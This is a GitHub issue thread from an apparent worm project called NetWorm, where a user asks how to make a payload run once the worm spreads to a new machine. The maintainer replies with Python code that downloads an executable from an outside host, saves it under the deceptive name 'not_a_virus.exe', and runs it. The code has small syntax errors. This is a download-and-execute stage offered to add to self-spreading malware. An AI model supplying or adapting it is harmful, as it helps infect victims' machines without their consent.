### ISSUE TITLE
Payload Question

### ISSUE THREAD

**Issue by OfficalMINI** [pylyf/NetWorm#8]
Does the payload get run after spreading to a new machine, if not how would one achieve that?

**Comment by pylyf** [comment]
If the payload is also a python code, then you can just write it in the worm.py.

If you want to execute a different program:
1) Make sure the payload gets downloaded
```
// Example of downloading a payload from a website

url = "https://your-page.com/payload.exe" // A website hosting the payload
filename= "not_a_virus.exe // Save the file with this name
urllib.request.urlretrieve(url, filename) // Download
```

2) [Execute it (Stackoverflow)](https://stackoverflow.com/questions/1811691/running-an-outside-program-executable-in-python)


```
import os
os.startfile("payload.exe")
```
